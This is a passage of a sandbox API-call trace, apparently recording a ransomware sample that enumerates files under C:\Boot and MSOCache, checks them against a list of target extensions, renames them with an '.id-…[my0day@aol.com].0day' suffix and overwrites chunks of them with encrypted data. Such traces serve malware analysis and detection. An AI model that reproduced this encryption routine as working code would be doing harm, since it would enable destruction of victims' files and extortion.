"c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0033.091] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.091] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.091] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.091] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.091] lstrlenW (lpString=".doc") returned 4 [0033.091] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.091] lstrlenW (lpString=".docx") returned 5 [0033.091] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.091] lstrlenW (lpString=".pdf") returned 4 [0033.091] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.091] lstrlenW (lpString=".xls") returned 4 [0033.091] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.091] lstrlenW (lpString=".xlsx") returned 5 [0033.091] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.091] lstrlenW (lpString=".ppt") returned 4 [0033.091] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.091] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.091] lstrlenW (lpString=".zip") returned 4 [0033.092] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.092] lstrlenW (lpString=".rar") returned 4 [0033.092] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.092] lstrlenW (lpString=".bz2") returned 4 [0033.092] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.092] lstrlenW (lpString=".7z") returned 3 [0033.092] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.092] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.092] lstrlenW (lpString=".dbf") returned 4 [0033.092] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.092] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.092] lstrlenW (lpString=".1cd") returned 4 [0033.092] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.092] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.092] lstrlenW (lpString=".jpg") returned 4 [0033.092] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.092] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.092] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.092] lstrlenW (lpString=".doc") returned 4 [0033.092] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.092] lstrlenW (lpString=".docx") returned 5 [0033.092] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.092] lstrlenW (lpString=".pdf") returned 4 [0033.092] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.092] lstrlenW (lpString=".xls") returned 4 [0033.092] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.092] lstrlenW (lpString=".xlsx") returned 5 [0033.092] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.092] lstrlenW (lpString=".ppt") returned 4 [0033.092] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.092] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.092] lstrlenW (lpString=".zip") returned 4 [0033.092] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.093] lstrlenW (lpString=".rar") returned 4 [0033.093] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.093] lstrlenW (lpString=".bz2") returned 4 [0033.093] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.093] lstrlenW (lpString=".7z") returned 3 [0033.093] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.093] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.093] lstrlenW (lpString=".dbf") returned 4 [0033.093] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0033.093] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.093] lstrlenW (lpString=".1cd") returned 4 [0033.093] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0033.093] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0033.093] lstrlenW (lpString=".jpg") returned 4 [0033.093] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0033.093] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0033.093] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0033.093] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0033.093] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=94800) returned 1 [0033.093] CloseHandle (hObject=0x180) returned 1 [0033.093] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0033.094] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.094] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.094] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0033.094] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0033.094] lstrlenW (lpString=".doc") returned 4 [0033.094] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0033.094] lstrlenW (lpString=".docx") returned 5 [0033.094] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0033.094] lstrlenW (lpString=".pdf") returned 4 [0033.094] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0033.094] lstrlenW (lpString=".xls") returned 4 [0033.094] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0033.094] lstrlenW (lpString=".xlsx") returned 5 [0033.094] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0033.094] lstrlenW (lpString=".ppt") returned 4 [0033.094] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0033.094] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0033.094] lstrlenW (lpString=".zip") returned 4 [0033.094] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0033.094] lstrlenW (lpString=".rar") returned 4 [0033.094] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0033.094] lstrlenW (lpString=".bz2") returned 4 [0033.094] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0033.094] lstrlenW (lpString=".7z") returned 3 [0033.094] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0033.096] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=85056) returned 1 [0033.096] CloseHandle (hObject=0x180) returned 1 [0033.096] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0033.096] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.096] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.097] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=43600) returned 1 [0033.097] CloseHandle (hObject=0x180) returned 1 [0033.097] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0033.097] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.097] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.097] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=90192) returned 1 [0033.097] CloseHandle (hObject=0x180) returned 1 [0033.097] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui")) returned 0x20 [0033.097] GetFileAttributesW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.097] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.098] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=89152) returned 1 [0033.098] CloseHandle (hObject=0x180) returned 1 [0033.101] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui")) returned 0x20 [0033.101] GetFileAttributesW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.101] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0033.101] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3694080) returned 1 [0033.101] CloseHandle (hObject=0x180) returned 1 [0033.101] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf")) returned 0x20 [0033.102] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0033.102] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0033.941] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0033.941] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0033.941] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0033.941] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0033.941] ReadFile (in: hFile=0x170, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.949] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0033.949] ReadFile (in: hFile=0x170, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.962] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0033.962] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0033.962] ReadFile (in: hFile=0x170, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0033.980] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.980] WriteFile (in: hFile=0x170, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc010e, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc010e, lpOverlapped=0x0) returned 1 [0034.185] SetEndOfFile (hFile=0x170) returned 1 [0034.323] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3ed3070 [0034.371] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.371] WriteFile (in: hFile=0x170, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.373] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.373] WriteFile (in: hFile=0x170, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.379] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0034.379] WriteFile (in: hFile=0x170, lpBuffer=0x3ed3070*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ed3070*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0034.382] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed3070 | out: hHeap=0x5f0000) returned 1 [0034.382] CloseHandle (hObject=0x170) returned 1 [0034.661] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.661] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.661] lstrlenW (lpString=".doc") returned 4 [0034.661] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.661] lstrlenW (lpString=".docx") returned 5 [0034.661] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.661] lstrlenW (lpString=".pdf") returned 4 [0034.943] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.943] lstrlenW (lpString=".xls") returned 4 [0034.943] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.943] lstrlenW (lpString=".xlsx") returned 5 [0034.943] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.943] lstrlenW (lpString=".ppt") returned 4 [0034.943] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.943] lstrlenW (lpString=".zip") returned 4 [0034.943] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.943] lstrlenW (lpString=".rar") returned 4 [0034.943] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.943] lstrlenW (lpString=".bz2") returned 4 [0034.943] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.943] lstrlenW (lpString=".7z") returned 3 [0034.943] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.943] lstrlenW (lpString=".dbf") returned 4 [0034.943] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.943] lstrlenW (lpString=".1cd") returned 4 [0034.943] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.943] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.944] lstrlenW (lpString=".jpg") returned 4 [0034.944] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.944] lstrlenW (lpString=".doc") returned 4 [0034.944] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0034.944] lstrlenW (lpString=".docx") returned 5 [0034.944] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0034.944] lstrlenW (lpString=".pdf") returned 4 [0034.944] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0034.944] lstrlenW (lpString=".xls") returned 4 [0034.944] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0034.944] lstrlenW (lpString=".xlsx") returned 5 [0034.944] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0034.944] lstrlenW (lpString=".ppt") returned 4 [0034.944] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0034.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.944] lstrlenW (lpString=".zip") returned 4 [0034.944] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0034.944] lstrlenW (lpString=".rar") returned 4 [0034.944] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0034.944] lstrlenW (lpString=".bz2") returned 4 [0034.944] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0034.944] lstrlenW (lpString=".7z") returned 3 [0034.944] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0034.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.944] lstrlenW (lpString=".dbf") returned 4 [0034.944] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0034.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.944] lstrlenW (lpString=".1cd") returned 4 [0034.944] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0034.944] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 80 [0034.944] lstrlenW (lpString=".jpg") returned 4 [0034.944] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0034.945] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0034.945] lstrlenW (lpString="PubLR.cab") returned 9 [0034.945] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0034.945] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=9958388) returned 1 [0034.945] CloseHandle (hObject=0x1ac) returned 1 [0034.945] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab")) returned 0x2020 [0034.945] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.945] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0034.954] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0034.954] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0034.955] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0034.955] ReadFile (in: hFile=0x1b0, lpBuffer=0x3a60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3a60058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.044] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.044] ReadFile (in: hFile=0x1b0, lpBuffer=0x3aa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3aa0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.088] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.089] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x93f3f4, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.089] ReadFile (in: hFile=0x1b0, lpBuffer=0x3ae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3ae0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.107] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.107] WriteFile (in: hFile=0x1b0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0035.214] SetEndOfFile (hFile=0x1b0) returned 1 [0035.214] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f6a0a0 [0035.218] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.218] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f6a0a0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f6a0a0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.220] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x32a6a6, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.220] WriteFile (in: hFile=0x1b0, lpBuffer=0x3f6a0a0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f6a0a0*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.224] 